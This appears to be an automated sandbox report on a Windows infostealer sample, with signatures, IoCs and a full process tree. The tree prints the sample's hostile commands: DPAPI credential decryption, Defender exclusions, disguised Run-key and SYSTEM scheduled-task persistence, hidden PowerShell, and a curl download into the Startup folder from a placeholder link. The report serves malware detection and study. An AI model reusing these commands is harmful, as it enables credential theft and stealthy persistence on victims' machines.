Analysis
-
max time kernel
300s -
max time network
304s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system -
submitted
03-06-2024 09:47
Static task
static1
Behavioral task
behavioral1
Sample
xylex.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
xylex.exe
Resource
win10v2004-20240426-en
General
-
Target
xylex.exe
-
Size
37.6MB
-
MD5
8eacf3f9be7e3735352c4020fc4e05e9
-
SHA1
0bb6c048d9e683e152de21f7d368a4c151095504
-
SHA256
4c5b20b4ca8009ab72a76ed7fa6e09bd1b0b78969980f2b49d9a6641439c8d7e
-
SHA512
2f5c54c4561f14fbf9a58075dffe268247f3af3408084c12a8a7ed0fbb33f01448e85a06ba684b037e0489fbcbb7481a825cf23785c7b7c1d60c28467825e3f0
-
SSDEEP
786432:R3on1HvSzxAMNjFZArYs4nPv0so7OZJJe:RYn1HvSpNjXm4P5u2e
Malware Config
Signatures
-
Processes:
pid   process
2448  powershell.exe
4444  powershell.exe
2440  powershell.exe
396   powershell.exe
3052  powershell.exe
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description        ioc                                                                                                  process
Key value queried  \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation  xylex.exe
Key value queried  \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation  cscript.exe
-
Loads dropped DLL 1 IoCs
Processes:
pid   process
3396  xylex.exe
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
description      ioc  process
Set value (str)  \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Roaming\\gVudEeAjIOYTLzJ.ps1\""  powershell.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Local\\Temp\\xylex.exe"  reg.exe
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow  ioc
12    api.ipify.org
-
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
Processes:
pid   process
508   cmd.exe
2216  cmd.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Detects videocard installed 1 TTPs 9 IoCs
Uses WMIC.exe to determine videocard installed.
Processes:
pid   process
3400  WMIC.exe
3748  WMIC.exe
4560  WMIC.exe
1216  WMIC.exe
4732  WMIC.exe
1456  WMIC.exe
3888  WMIC.exe
3828  WMIC.exe
3436  WMIC.exe
-
Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
pid   process
4404  tasklist.exe
4484  tasklist.exe
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
description        ioc                                                               process
Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS                    chrome.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName  chrome.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer  chrome.exe
-
Modifies data under HKEY_USERS 2 IoCs
Processes:
description      ioc                                                                                                    process
Key created      \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry                                   chrome.exe
Set value (int)  \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133618820258415901"  chrome.exe
-
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 48 IoCs
Processes:
pid   process         count (identical adjacent rows collapsed; 48 rows in total)
4444  powershell.exe  2
1020  powershell.exe  2
3580  powershell.exe  2
2440  powershell.exe  2
396   powershell.exe  3
3588  powershell.exe  3
3052  powershell.exe  3
1660  powershell.exe  3
3580  powershell.exe  3
2448  powershell.exe  3
636   powershell.exe  3
3940  powershell.exe  2
3396  xylex.exe       2
3148  powershell.exe  2
3396  xylex.exe       1
3624  powershell.exe  2
3092  powershell.exe  3
3364  powershell.exe  3
4512  chrome.exe      2
3580  chrome.exe      2
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
Processes:
pid   process     count
4512  chrome.exe  6
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
description                          pid   process
Token: SeDebugPrivilege              4444  powershell.exe
Token: SeDebugPrivilege              4484  tasklist.exe
Token: SeDebugPrivilege              4404  tasklist.exe
Token: SeDebugPrivilege              1020  powershell.exe
Token: SeDebugPrivilege              3580  powershell.exe
Token: SeIncreaseQuotaPrivilege      4188  WMIC.exe
Token: SeSecurityPrivilege           4188  WMIC.exe
Token: SeTakeOwnershipPrivilege      4188  WMIC.exe
Token: SeLoadDriverPrivilege         4188  WMIC.exe
Token: SeSystemProfilePrivilege      4188  WMIC.exe
Token: SeSystemtimePrivilege         4188  WMIC.exe
Token: SeProfSingleProcessPrivilege  4188  WMIC.exe
Token: SeIncBasePriorityPrivilege    4188  WMIC.exe
Token: SeCreatePagefilePrivilege     4188  WMIC.exe
Token: SeBackupPrivilege             4188  WMIC.exe
Token: SeRestorePrivilege            4188  WMIC.exe
Token: SeShutdownPrivilege           4188  WMIC.exe
Token: SeDebugPrivilege              4188  WMIC.exe
Token: SeSystemEnvironmentPrivilege  4188  WMIC.exe
Token: SeRemoteShutdownPrivilege     4188  WMIC.exe
Token: SeUndockPrivilege             4188  WMIC.exe
Token: SeManageVolumePrivilege       4188  WMIC.exe
Token: 33                            4188  WMIC.exe
Token: 34                            4188  WMIC.exe
Token: 35                            4188  WMIC.exe
Token: 36                            4188  WMIC.exe
Token: SeDebugPrivilege              2440  powershell.exe
Token: SeIncreaseQuotaPrivilege      4188  WMIC.exe
Token: SeSecurityPrivilege           4188  WMIC.exe
Token: SeTakeOwnershipPrivilege      4188  WMIC.exe
Token: SeLoadDriverPrivilege         4188  WMIC.exe
Token: SeSystemProfilePrivilege      4188  WMIC.exe
Token: SeSystemtimePrivilege         4188  WMIC.exe
Token: SeProfSingleProcessPrivilege  4188  WMIC.exe
Token: SeIncBasePriorityPrivilege    4188  WMIC.exe
Token: SeCreatePagefilePrivilege     4188  WMIC.exe
Token: SeBackupPrivilege             4188  WMIC.exe
Token: SeRestorePrivilege            4188  WMIC.exe
Token: SeShutdownPrivilege           4188  WMIC.exe
Token: SeDebugPrivilege              4188  WMIC.exe
Token: SeSystemEnvironmentPrivilege  4188  WMIC.exe
Token: SeRemoteShutdownPrivilege     4188  WMIC.exe
Token: SeUndockPrivilege             4188  WMIC.exe
Token: SeManageVolumePrivilege       4188  WMIC.exe
Token: 33                            4188  WMIC.exe
Token: 34                            4188  WMIC.exe
Token: 35                            4188  WMIC.exe
Token: 36                            4188  WMIC.exe
Token: SeIncreaseQuotaPrivilege      3624  WMIC.exe
Token: SeSecurityPrivilege           3624  WMIC.exe
Token: SeTakeOwnershipPrivilege      3624  WMIC.exe
Token: SeLoadDriverPrivilege         3624  WMIC.exe
Token: SeSystemProfilePrivilege      3624  WMIC.exe
Token: SeSystemtimePrivilege         3624  WMIC.exe
Token: SeProfSingleProcessPrivilege  3624  WMIC.exe
Token: SeIncBasePriorityPrivilege    3624  WMIC.exe
Token: SeCreatePagefilePrivilege     3624  WMIC.exe
Token: SeBackupPrivilege             3624  WMIC.exe
Token: SeRestorePrivilege            3624  WMIC.exe
Token: SeShutdownPrivilege           3624  WMIC.exe
Token: SeDebugPrivilege              3624  WMIC.exe
Token: SeSystemEnvironmentPrivilege  3624  WMIC.exe
Token: SeRemoteShutdownPrivilege     3624  WMIC.exe
Token: SeUndockPrivilege             3624  WMIC.exe
-
Suspicious use of FindShellTrayWindow 26 IoCs
Processes:
pid   process     count
4512  chrome.exe  26
-
Suspicious use of SendNotifyMessage 24 IoCs
Processes:
pid   process     count
4512  chrome.exe  24
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description                        pid   process         target process       count (each row is reported twice; 64 rows in total)
PID 3396 wrote to memory of 1648   3396  xylex.exe       cmd.exe              2
PID 1648 wrote to memory of 804    1648  cmd.exe         cmd.exe              2
PID 1648 wrote to memory of 4444   1648  cmd.exe         powershell.exe       2
PID 4444 wrote to memory of 4876   4444  powershell.exe  csc.exe              2
PID 4876 wrote to memory of 2836   4876  csc.exe         cvtres.exe           2
PID 3396 wrote to memory of 1536   3396  xylex.exe       cmd.exe              2
PID 3396 wrote to memory of 856    3396  xylex.exe       cmd.exe              2
PID 1536 wrote to memory of 2524   1536  cmd.exe         curl.exe             2
PID 856 wrote to memory of 4484    856   cmd.exe         tasklist.exe         2
PID 3396 wrote to memory of 1208   3396  xylex.exe       curl.exe             2
PID 3396 wrote to memory of 508    3396  xylex.exe       cmd.exe              2
PID 1208 wrote to memory of 4404   1208  cmd.exe         tasklist.exe         2
PID 508 wrote to memory of 1020    508   cmd.exe         WMIC.exe             2
PID 3396 wrote to memory of 2216   3396  xylex.exe       cmd.exe              2
PID 2216 wrote to memory of 3580   2216  cmd.exe         powershell.exe       2
PID 3396 wrote to memory of 1712   3396  xylex.exe       cmd.exe              2
PID 3396 wrote to memory of 5040   3396  xylex.exe       cmd.exe              2
PID 3396 wrote to memory of 2740   3396  xylex.exe       cmd.exe              2
PID 1712 wrote to memory of 4188   1712  cmd.exe         WMIC.exe             2
PID 5040 wrote to memory of 4920   5040  cmd.exe         reg.exe              2
PID 3396 wrote to memory of 404    3396  xylex.exe       cmd.exe              2
PID 2740 wrote to memory of 716    2740  cmd.exe         schtasks.exe         2
PID 404 wrote to memory of 2440    404   cmd.exe         powershell.exe       2
PID 3396 wrote to memory of 1884   3396  xylex.exe       cmd.exe              2
PID 1884 wrote to memory of 3624   1884  cmd.exe         WMIC.exe             2
PID 3396 wrote to memory of 4720   3396  xylex.exe       cmd.exe              2
PID 3396 wrote to memory of 3636   3396  xylex.exe       cmd.exe              2
PID 4720 wrote to memory of 2004   4720  cmd.exe         cscript.exe          2
PID 3636 wrote to memory of 4916   3636  cmd.exe         WMIC.exe             2
PID 3396 wrote to memory of 3324   3396  xylex.exe       cmd.exe              2
PID 3324 wrote to memory of 3480   3324  cmd.exe         WaaSMedicAgent.exe   2
PID 3324 wrote to memory of 4980   3324  cmd.exe         find.exe             2
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
1⤵ C:\Users\Admin\AppData\Local\Temp\xylex.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\xylex.exe"
   - Checks computer location settings
   - Loads dropped DLL
   - Suspicious behavior: EnumeratesProcesses
   - Suspicious use of WriteProcessMemory
   PID: 3396
-
2⤵ C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"
   - Suspicious use of WriteProcessMemory
   PID: 1648
-
3⤵ C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "
   PID: 804
-
3⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
   Command line: powershell.exe -noprofile -
   - Command and Scripting Interpreter: PowerShell
   - Suspicious behavior: EnumeratesProcesses
   - Suspicious use of AdjustPrivilegeToken
   - Suspicious use of WriteProcessMemory
   PID: 4444
-
4⤵ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
   Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\p22tuu2q\p22tuu2q.cmdline"
   - Suspicious use of WriteProcessMemory
   PID: 4876
-
5⤵ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
   Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES85E9.tmp" "c:\Users\Admin\AppData\Local\Temp\p22tuu2q\CSCA1265762AF2049E0913954F9F1C15260.TMP"
   PID: 2836
-
2⤵ C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
   - Suspicious use of WriteProcessMemory
   PID: 1536
-
3⤵ C:\Windows\system32\curl.exe
   Command line: curl http://api.ipify.org/ --ssl-no-revoke
   PID: 2524
-
2⤵ C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
   - Suspicious use of WriteProcessMemory
   PID: 856
-
3⤵ C:\Windows\system32\tasklist.exe
   Command line: tasklist
   - Enumerates processes with tasklist
   - Suspicious use of AdjustPrivilegeToken
   PID: 4484
-
2⤵ C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
   - Suspicious use of WriteProcessMemory
   PID: 1208
-
3⤵ C:\Windows\system32\tasklist.exe
   Command line: tasklist
   - Enumerates processes with tasklist
   - Suspicious use of AdjustPrivilegeToken
   PID: 4404
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,21,13,251,61,125,41,113,73,181,63,165,1,91,36,248,68,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,52,149,19,144,89,112,59,59,251,229,141,202,64,101,240,104,137,13,3,69,53,156,155,146,175,90,146,162,246,238,201,90,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,8,59,176,18,137,226,140,52,19,171,62,247,31,153,110,138,40,43,108,72,120,10,22,206,204,166,195,251,206,76,84,236,48,0,0,0,182,67,21,24,178,28,183,38,171,5,235,33,128,96,100,191,115,29,3,244,255,89,222,94,221,44,46,134,199,244,235,56,71,157,109,19,168,133,44,36,119,44,14,122,209,122,31,112,64,0,0,0,122,214,19,81,118,163,136,78,57,148,251,210,240,3,134,99,156,175,50,154,230,153,101,220,35,132,92,147,223,230,14,232,202,102,120,97,201,199,70,225,226,97,114,2,149,239,63,52,211,209,152,49,2,92,152,238,148,185,58,73,30,45,12,201), $null, 'CurrentUser')"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:508 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,21,13,251,61,125,41,113,73,181,63,165,1,91,36,248,68,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,52,149,19,144,89,112,59,59,251,229,141,202,64,101,240,104,137,13,3,69,53,156,155,146,175,90,146,162,246,238,201,90,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,8,59,176,18,137,226,140,52,19,171,62,247,31,153,110,138,40,43,108,72,120,10,22,206,204,166,195,251,206,76,84,236,48,0,0,0,182,67,21,24,178,28,183,38,171,5,235,33,128,96,100,191,115,29,3,244,255,89,222,94,221,44,46,134,199,244,235,56,71,157,109,19,168,133,44,36,119,44,14,122,209,122,31,112,64,0,0,0,122,214,19,81,118,163,136,78,57,148,251,210,240,3,134,99,156,175,50,154,230,153,101,220,35,132,92,147,223,230,14,232,202,102,120,97,201,199,70,225,226,97,114,2,149,239,63,52,211,209,152,49,2,92,152,238,148,185,58,73,30,45,12,201), $null, 'CurrentUser')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1020 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,21,13,251,61,125,41,113,73,181,63,165,1,91,36,248,68,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,87,225,225,105,74,250,17,14,121,162,50,56,214,71,202,251,32,121,40,26,5,205,214,52,26,191,58,177,200,241,246,155,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,137,230,184,142,248,175,36,120,222,4,110,117,60,85,255,52,21,39,177,126,38,76,194,9,75,54,127,87,52,196,251,57,48,0,0,0,62,242,129,76,25,82,189,44,92,5,130,128,156,115,35,25,175,83,81,85,159,232,192,255,184,181,3,127,179,216,232,85,78,47,144,255,115,62,133,108,75,82,5,154,21,128,253,243,64,0,0,0,96,3,115,172,134,228,139,54,161,25,254,150,216,24,138,103,124,43,211,181,183,191,211,17,78,104,20,9,218,8,230,157,99,145,15,109,156,238,65,113,104,211,133,73,126,187,22,212,132,81,131,66,39,202,237,184,142,225,59,166,44,170,47,76), $null, 'CurrentUser')"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:2216 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,21,13,251,61,125,41,113,73,181,63,165,1,91,36,248,68,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,87,225,225,105,74,250,17,14,121,162,50,56,214,71,202,251,32,121,40,26,5,205,214,52,26,191,58,177,200,241,246,155,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,137,230,184,142,248,175,36,120,222,4,110,117,60,85,255,52,21,39,177,126,38,76,194,9,75,54,127,87,52,196,251,57,48,0,0,0,62,242,129,76,25,82,189,44,92,5,130,128,156,115,35,25,175,83,81,85,159,232,192,255,184,181,3,127,179,216,232,85,78,47,144,255,115,62,133,108,75,82,5,154,21,128,253,243,64,0,0,0,96,3,115,172,134,228,139,54,161,25,254,150,216,24,138,103,124,43,211,181,183,191,211,17,78,104,20,9,218,8,230,157,99,145,15,109,156,238,65,113,104,211,133,73,126,187,22,212,132,81,131,66,39,202,237,184,142,225,59,166,44,170,47,76), $null, 'CurrentUser')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3580 -
2⤵ C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
   - Suspicious use of WriteProcessMemory
   PID: 1712
-
3⤵ C:\Windows\System32\Wbem\WMIC.exe
   Command line: wmic diskdrive get serialnumber
   - Suspicious use of AdjustPrivilegeToken
   PID: 4188
-
2⤵ C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"
   - Suspicious use of WriteProcessMemory
   PID: 5040
-
3⤵ C:\Windows\system32\reg.exe
   Command line: reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f
   PID: 4920
-
2⤵ C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
   - Suspicious use of WriteProcessMemory
   PID: 2740
-
3⤵ C:\Windows\system32\schtasks.exe
   Command line: schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
   - Creates scheduled task(s)
   PID: 716
-
2⤵ C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
   - Suspicious use of WriteProcessMemory
   PID: 404
-
3⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
   Command line: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
   - Command and Scripting Interpreter: PowerShell
   - Adds Run key to start application
   - Suspicious behavior: EnumeratesProcesses
   - Suspicious use of AdjustPrivilegeToken
   PID: 2440
-
4⤵ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
   Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vceksnax\vceksnax.cmdline"
   PID: 1956
-
5⤵ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
   Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8BB5.tmp" "c:\Users\Admin\AppData\Local\Temp\vceksnax\CSCD2DBB8F6B0184DA7A2FC58E67274FB2.TMP"
   PID: 1248
-
2⤵ C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
   - Suspicious use of WriteProcessMemory
   PID: 1884
-
3⤵ C:\Windows\System32\Wbem\WMIC.exe
   Command line: wmic bios get smbiosbiosversion
   - Suspicious use of AdjustPrivilegeToken
   PID: 3624
-
2⤵ C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""
   - Suspicious use of WriteProcessMemory
   PID: 4720
-
3⤵ C:\Windows\system32\cscript.exe
   Command line: cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"
   - Checks computer location settings
   PID: 2004
-
4⤵ C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "
   PID: 1000
-
5⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
   Command line: powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
   - Command and Scripting Interpreter: PowerShell
   - Suspicious behavior: EnumeratesProcesses
   PID: 396
-
5⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
   Command line: powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"
   - Command and Scripting Interpreter: PowerShell
   - Suspicious behavior: EnumeratesProcesses
   PID: 3052
-
5⤵ C:\Windows\system32\reg.exe
   Command line: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\xylex.exe" /f
   - Adds Run key to start application
   - Modifies registry key
   PID: 4600
-
5⤵ C:\Windows\system32\reg.exe
   Command line: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"
   - Modifies registry key
   PID: 216
-
5⤵ C:\Windows\system32\curl.exe
   Command line: curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE
   PID: 4936
-
2⤵ C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
   - Suspicious use of WriteProcessMemory
   PID: 3636
-
3⤵ C:\Windows\System32\Wbem\WMIC.exe
   Command line: wmic baseboard get serialnumber
   PID: 4916
-
2⤵ C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
   - Suspicious use of WriteProcessMemory
   PID: 3324
-
3⤵ C:\Windows\System32\Wbem\WMIC.exe
   Command line: wmic MemoryChip get /format:list
   PID: 3480
-
3⤵ C:\Windows\system32\find.exe
   Command line: find /i "Speed"
   PID: 4980
-
2⤵ C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
   PID: 2340
-
3⤵ C:\Windows\System32\Wbem\WMIC.exe
   Command line: wmic path win32_computersystemproduct get uuid
   PID: 3432
-
2⤵ C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
   PID: 2748
-
3⤵ C:\Windows\System32\Wbem\WMIC.exe
   Command line: wmic path win32_VideoController get name
   - Detects videocard installed
   PID: 4732
-
2⤵ C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
   PID: 3576
-
3⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
   Command line: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
   - Suspicious behavior: EnumeratesProcesses
   PID: 3588
-
2⤵ C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
   PID: 4776
-
3⤵ C:\Windows\System32\Wbem\WMIC.exe
   Command line: wmic PATH Win32_VideoController GET Description,PNPDeviceID
   PID: 3256
-
2⤵ C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
   PID: 4164
-
3⤵ C:\Windows\System32\Wbem\WMIC.exe
   Command line: wmic memorychip get serialnumber
   PID: 1020
-
2⤵ C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
   PID: 5064
-
3⤵ C:\Windows\system32\curl.exe
   Command line: curl http://api.ipify.org/ --ssl-no-revoke
   PID: 1208
-
2⤵ C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
   PID: 4416
-
3⤵ C:\Windows\System32\Wbem\WMIC.exe
   Command line: wmic csproduct get uuid
   PID: 5008
-
2⤵ C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
   PID: 924
-
3⤵ C:\Windows\System32\Wbem\WMIC.exe
   Command line: wmic cpu get processorid
   PID: 1772
-
2⤵ C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
   PID: 3204
-
3⤵ C:\Windows\system32\getmac.exe
   Command line: getmac /NH
   PID: 3112
-
2⤵ C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
   PID: 3436
-
3⤵ C:\Windows\System32\Wbem\WMIC.exe
   Command line: wmic bios get smbiosbiosversion
   PID: 2348
-
2⤵ C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
   PID: 2044
-
3⤵ C:\Windows\System32\Wbem\WMIC.exe
   Command line: wmic MemoryChip get /format:list
   PID: 1172
-
3⤵ C:\Windows\system32\find.exe
   Command line: find /i "Speed"
   PID: 1164
-
2⤵ C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
   PID: 2012
-
3⤵ C:\Windows\System32\Wbem\WMIC.exe
   Command line: wmic path win32_VideoController get name
   - Detects videocard installed
   PID: 1456
-
2⤵ C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
   PID: 2624
-
3⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
   Command line: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
   - Suspicious behavior: EnumeratesProcesses
   PID: 1660
-
2⤵ C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
   PID: 1680
-
3⤵ C:\Windows\system32\curl.exe
   Command line: curl http://api.ipify.org/ --ssl-no-revoke
   PID: 1156
-
2⤵ C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
   PID: 2340
-
3⤵ C:\Windows\System32\Wbem\WMIC.exe
   Command line: wmic bios get smbiosbiosversion
   PID: 5116
-
2⤵ C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
   PID: 3652
-
3⤵ C:\Windows\System32\Wbem\WMIC.exe
   Command line: wmic MemoryChip get /format:list
   PID: 2104
-
3⤵ C:\Windows\system32\find.exe
   Command line: find /i "Speed"
   PID: 4968
-
